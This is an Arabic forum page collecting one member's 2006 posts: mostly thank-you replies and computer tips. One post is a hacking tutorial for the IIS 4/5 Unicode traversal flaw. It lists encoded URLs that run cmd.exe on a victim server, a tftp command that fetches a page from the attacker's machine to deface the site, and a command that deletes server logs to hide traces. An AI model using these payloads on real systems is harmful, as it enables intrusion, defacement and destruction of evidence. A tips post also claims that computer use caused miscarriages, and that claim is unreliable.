ردود العضو
-
الكاتبالمشاركات
-
3 مارس، 2006 الساعة 6:45 ص #646056عيناوي22مشارك
ملاك انشاء الله بنرد بس تعرفي هلاايام الدراسه
ومشاغل الدنيا بس اهم شيء دراسه من كل شيء
وانشاء الله لما نحصل وقت بتحصلينا بالشات
26 فبراير، 2006 الساعة 12:04 م #645211عيناوي22مشاركمشكوووور أخوي حجاج على المعلومه الجميله مشاء الله على المعالج الجديد بتكون سرعته عاليه جدا
ودائما شركة IBM سباقه في مثل هذه الاشياء
ننتظر المزيد من مشاركاتك اخوي
16 فبراير، 2006 الساعة 10:43 ص #642940عيناوي22مشاركالصراحه البرنامج أكثر من الرائع يمكن الطلاب والمدرسين والمدير وأولياء الامور من التوصل
مع بعضهم البعض دائما لما يحقق مصلحة الطلاب
مشكوووره أختي على البرنامج الرائع
16 فبراير، 2006 الساعة 10:38 ص #642939عيناوي22مشاركمشكوووور أخوي موبي على البرنامج بس اللي أعرفه أفضل برنامج ضغط للملفات هو winzip
إنشاء الله جاري التحميل وبنشوف الفرق
الله يعيطك اف عافيه أخوي
16 فبراير، 2006 الساعة 10:31 ص #642938عيناوي22مشاركمشكوووور أخوي موبي على البرنامج الجميل والمفيد
وإنشاء الله جاري التحميل
16 فبراير، 2006 الساعة 10:20 ص #642936عيناوي22مشاركتسلمين أختي السولعيه على الأختصارات أنشاء الله يستفيد منها الجميع
16 فبراير، 2006 الساعة 10:17 ص #642934عيناوي22مشاركهذه الطريقه مجربه ومضمونه 100% مشكوووره أختي السولعيه على الطريقه المفيده
الله يعطيج الف عافيه
16 فبراير، 2006 الساعة 9:56 ص #642929عيناوي22مشاركيسلمواعلى المرور الجميل أخواني أرجوا من الجميع أنهم أستفادوا من الأداءة
الله لا يحرمنا منكم ومن طلتكم الجميله
15 فبراير، 2006 الساعة 9:24 ص #642581عيناوي22مشاركمبرووووووووك عليك وعلينا أخوي الندابي المجلس الجديد إنشاء الله راح يكون مجلس خير وفايده يستفيد منها الجميع
وإنشاء الله راح نقدم الأفضل في هذا المجلس
لك مني ألف شكر أخوي الندابي على المجهود اللي تبذله من أجل تطوير مجالسنا
14 فبراير، 2006 الساعة 1:18 م #642404عيناوي22مشارك
مشكوووره أختي حنين الوعد على الموقع اللي في غاية الروعهبصراحه كل ما نتمناه موجود فيه
الله يعطيك الف عافيه أختي
والله لا يرحمنا منج ومن مواضيعج المتميزة دائما
12 فبراير، 2006 الساعة 10:32 ص #641746عيناوي22مشاركمشكووور أخوي على الشرح الجميل والرائع لتسجيل البرنامج ننتظر المزيد من مشاركاتك المفيده والجميله
9 فبراير، 2006 الساعة 11:35 ص #640946عيناوي22مشاركأخوي بندر هذا اللي قدرت أحصل عليه أنا أرجوا ان تستفيد منه بس قبل لا تخترق موقع تعلم معلومات عامه عن الهكرز ومصطلحات الهكرز
وارجوا ان تستفيد
بسم الله الرحمن الرحيم
IIS بداية نعرف ماهيهي خدمه متواجدة في ويندوز الفين بروفشنال وويندوز ان تي IISالـ
IIS5.0…وويندوز الفين يمتلك الاصدارة الخامسة من ملقم معلومات الانترنت
بسم الله نبدأ
توجد نقطة ضعف في الاي اي اس 4 او 5 وهذه النقطة تستغل بطريقة سهلة جداً
وتسمى هذه النقطة باليونيكود
وتنفيذها سهلاً لايحتاج الى خبرة عميقة في مجال اختراق المواقع
ولكن نقف عند هذه النقطة للمبتئيدئن
المبتدئين عامةً يفكرون الان في اختراق عدة مواقع شهيرة بهذه الطريقة
ولكن لا هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة
لان نقطة الضعف هذه لاتوجد الا في ويندوز الفين او ان تي
وأغلب المواقع الشهيرة تستخدم انظمة اليونكس واللنكس
أي ان ويندوز ان تي او الفين نظام حمايته محدودة وكل يوم تطلع ثغرات جديدة
لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الاضعاف الموجودة في الان تي
لكن بتلك الطريقة قد يكونون جعلو حاجزاً لهم من الهكرة
ولكن ليس دائماً
وتنفذ من داخل المتصفح
وطريقة تنفيذ الثغرة كالاتي :
http://www.xxxxxx.com/s***pts/..?../winnt/system32/cmd.exe?/c+dir+c:\
ركزو هنا الان بعد دوت كوم بدأت تنفيذ الثغرة
وبإمكانك أيضا دخول اي ملف وليس فقط رؤية السي c:هذه الثغرة تسمح لك بــ عرض جميع ملفات
وتوجد أكثر من ثغرة وهي
/s***pts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/s***pts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\
وطريقة تنفيذها من المتصفح
ومكان تنفيذها بعد اسم الموقع
مثال :
http://www.xxxxx.com/à/€/à/€/à/€/¯../winnt/system32/cmd.exe/?/c\+
أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر او على اي شكل يظهر
الحل بسيط
Dir هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات
وطريقة ظهور الملفات في المتصفح تقريبا
بنفس طريقة الدوس
إذا نجحت في تنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تنفيذالخطوة الثانية
الخطوة الثانية عمل ابلود للملف الذي تريد تحميله
وعمل الأبلود أيضاً لايحتاج الى خبرة
لكن هنالك شروط لكي تعمل ابلود
يجب التأكد من أن التي إف تي بي مثبت على الموقع الضحية
وللكي تتأكد إتبع الاتي
يجب الدخول على ملف السستم32 ولكي تدخله يجب أن تضيف بعض الكلمات على الثغرة التي نجحت في تنفيذها
مثال:
http://www.xxxxxx.com/s***pts/..?../winnt/system32/cmd.exe?/c+dir+c:\
هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات
لاحظ التغير
http://www.xxxxxx.com/s***pts/..?../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32\
ماوضع على الثغرة هو أسماء لملفات متواجدة داخل الويندوز Winnt\Sytem32\
أي يجب عليك الدخول على هذه الملفات لكي تتأكد
بعض القراء يتسالون ….. الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط للتطابقها يجب عليك الدخول باي كان على مللف السستم
ممكن يكون احد القراء اشتغلت معاه هذه الثغرة
http://www.xxxxx.com/s***pts/..ü€€€€¯../winnt/system32/cmd.exe?/c+dir+c:\
ويقول كيف ادخل على ملف السستم
الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تدخل على السستم 32
اي بعد هذا الامتداد
c+dir+c:\هنا تضيف أسماء الملفات
http://www.xxxxx.com/s***pts/..ü€€€€¯../winnt/system32/cmd.exe?/c+dir+c:\Winnt\System32\
كما قلنا سابقاَ لاتحتاج الى خبرة
وبعد دخول ملف السستم ستظهر لك محتوياته
ويجب على آنذاك البحث عن برنامج يسمي
tftp.exe يعني دور على هذا البرنامج الين ماتلقاه وتتأكد من انه في الجهاز
لان هذا البرنامج يعتبر شرط لكي تعمل ابلود للصفحة
ولو لقيت البرنامج اتفاءل بالخير يعني بإذن الله تعبك ماهو رايح على الفاضي
……………………………………………………………………………..
والشرط الثاني هو
يجب أن يكون عندك برنامج التي إف تي بي
وهذا البرنامج تقدر تنزله من هذا العنوان
http://www.geocities.com/anorR1234/tftpd32.zip
C:\وبعد ماتنزل البرنامج وتفك الضغط منه من الافضل إنك تحطه داخل الـ
وتحط أيضا البرامج أو الصفحة التي تريد أن تعمل لها أبلود في السي
تحطه في السي الى داخل جهازك مو الى دالخل الموقع
وتشغل البرنامج
tftp32.exe وتتركه يعمل الى أن تنتهى من مهمتك الأساسية
C:\أسمع كلامي وحط كل شي في
لأنك لو حطيتها بإذن الله راح تنجح المهمه
—————————————————————–
الان بدأنا في النقطة الخطرة وهي تحميل الملفات
مع العلم أني اقصد بالتحميل الابلود
أي
أبلود = تحميل
مو تجميل
وتحميل الملفات طريقة معقدة نسبياً بس أنا متفائل بالخير لأني معتقد أنكم راح تفهمو
المهم نرجع لموضوعنا
المهم طريقة نسخ الملفات تضاف ايضاً الى المتصفح
وتضاف بهذه الطريقة
مثال :
http://www.xxxxx.com/s***pts/..ü€€€€¯../winnt/system32/cmd.exe?/c+dir+c:\
تخيل الثغرة هذه اشتغلت معاك
ويجب عليك إنك تمسح بعض الإضافات من الثغرة لكي تضيف امر النسخ
/c+tftp.exe+”-i”+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
يعني الى راح نمسحه من الثغرة بيكون هذه الاضافة
/c+dir+c:\
عشان تظيف بدالها
/c+tftp.exe+”-i”+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
ولمن نظيف امر النسخ بيطلع لنا بهذا الطريقة
http://www.xxxxx.com/s***pts/..ü€€€€¯../winnt/system32/cmd.exe?/c+tftp.exe+”-i”+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
شايفين ياشباب إش الى اتغير
بس لازم أيضاً إنك تغير اللازم في أمر النسخ
مثل
tftp.exe هذا سيبه في حاله لانه اسم برنامج التي اف تي بي الى حاطه في السي ومشغله الان
“-i” هذا برضه سيبه لانه مهم
1.1.1.1 هنا بدال الارقام هذا تكتب الايبي تبع جهازك وعشان تتأكد من الايبي لمن تشغب التي اف تي بي راح يطلع ايبي وهذا الايبي الى طلعلك هو الى تكتبه
GET هذه الاضافة سيبها في حالها لانها تعتبر شرط في نسخ المفات
index.htm هذه اسم الصفحة الى راح تتحمل وممكن تغيرها عاد بكيفك انت
C:\inetpub\wwwroot\ وهذا مكان تواجد الصفحة الرئيسة الخاصة بالموقع
index.htm هنا تكتب إسم الصفحة او الملف التي تريده أن يظهر في الموقع
C:\يجب التأكد من إنك حاط الصفحة المراد تحميلها في جهازك داخل الـ
index.htm ومثلا اسم الصفحة
قبل ماتضغط انتر عشان تنسخ الملف تاكد من ان الثغرة الان صارت مشابها لمثل هذه الثغرة
http://www.xxxxx.com/s***pts/..ü€€€€¯../winnt/system32/cmd.exe?/c+tftp.exe+”-i”+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm
ولو طلعت مشابها لها اضغط إنتر وتوكل على الله
وبإذن الله راح يتنسخ الملف
————————————————————————————————————————————————————————————–
وفى النقطة الاخيرة والاهم
مسح ملفات تكون تجمعت داخل الجهاز ومكونة معلومات عنك مثل الايبي
http://server/msadc/..A¯../..A¯../..A¯../winnt/system32/cmd.exe?/c+del+c:\*.log
————————————–
وهذه لنكات لكي تسد الثغرة داخل موقعك اذا كانت شغالة
Patches to repair this Bug:IIS 4.0 on WinNT 4http://www.microsoft.com/ntserver/nts/downloads/***tical/q269862/default.asp
IIS 5.0 on Win2000http://www.microsoft.com/windows2000/downloads/***tical/q269862/default.asp
–9 فبراير، 2006 الساعة 11:03 ص #640937عيناوي22مشاركسوف أطرح عليكم اليوم ثلاث أسئله مع أجوبتها أرجوا أن تستفيدوا منها بسم الله نبتدي
السؤال :كيف يمكنني استرجاع رسلة إلكترونية تم إرسالها عن طريق الخطأ؟
الجواب:
يعاني عدد كبير من مستخدمي البريد الإلكتروني من عدم معرفتهم بالطريقة التي يمكنهم فيها استرجاع رسالة إلكترونية تم إرسالها عن طريق الخطأ إلى عنوان ما. ويمكن عن طريق مايكروسوفت أوت لوك استرجاع الرسائل الموجهة خطأ لعناوين ما ولكن قبل أن يفتحها ويقرأها الطرف الأخر.
ولاسترجاع رسائلك الخاطئة اتبع الخطوات التالية:
أولا: افتح برنامج مايكرسوفت أوت لوك.
ثانيا: افتح مجلد العناصر المرسلة sent items .
ثالثا: إنقر مرتين على الرسالة التي قمت بإرسالها بالخطأ.
رابعا: من قائمة <<إحداث actions >> قم باختيار (استرجاع هذه الرسالة) recall this message .
خامسا: إذا أردت إلغاء الرسالة قم باختيار مربع الخيار<<إلغاء النسخ غير المقروءة من الرسالة>>. Delete unread copies of this message .أما إذا أردت تغيير مضمون الرسالة غير المقروءة وأستبدالها بسرالة جديدة، قم باختيار مربع الخيار التالي:
Delete unread copies & replace it with a new message
وهكذا ستتمكن من استرجاع أو حذف أو تعديل أو استبدال الرسالة التي قمت بإرسالها بشكل خاطئ. ( إن هذه الطريقة تستخدم لمن لديه مايكروسوفت أوت لوك). وبإمكان من لا يتوفر لديه هذا البرنامج تنصيبه للإستفاده من خاصية استرجا الرسالة الخطأ.تنويهه: برنامج أوت لوك لا يعمل مع بريد الياهو والهوتميل حيث كانت هذه الخدمة مجانية في السابق ولكن تستطيع إنشاءه حسب بريد لك عبر أي مزود بريد أخر.
السؤال: أعاني من آلام في الرقبة هل هي بسبب الكمبيوتر؟
الجواب:
كشفت دراسة أجراها فريق بحث بأحد المراكز الخاصة بالبحوث عن إصابة 13.5% من مستخدمي الكمبيوتر بمرض جفاف العين بسبب استخدامهم المفرط للكمبيوتر.
وأشارت الدراسة التي نشرت مؤخرا إلى شعور المفرطين بإستخدام الكمبيوتر بالإراهاق البصري مؤكدة إصابة 33.8% من مستخدمي الكمبيوتر بآلام في الرقبة والأكتاف والظهر والإحساس بتنميل الأيادي… وقالت الدراسة أن الاستخدام المفرط للكمبيوتر أدى إلى إجهاض 3 سيدات حوامل!
السؤال: ما هو الإصدار النهائي لويندوزXP ؟ وكيف أعرف إصدار النسخة التي أشغلها؟
الجواب:
الإصدار النهائي لويندوز XP هو 2600 windows media service pack2. وللتأكد من إصدار الويندوز لديك اذهب إلى start > RUN ونفذ الأمر WINVER .
8 فبراير، 2006 الساعة 11:07 ص #640614عيناوي22مشاركمشكووور مشرفنا على الشرح الجميل لطريقة دمج الصورتين الله يعطيك الف عافيه على مجهودك الرائع
5 فبراير، 2006 الساعة 11:08 ص #639680عيناوي22مشاركتسلم اخوي قمر العرب على تردد القناه -
الكاتبالمشاركات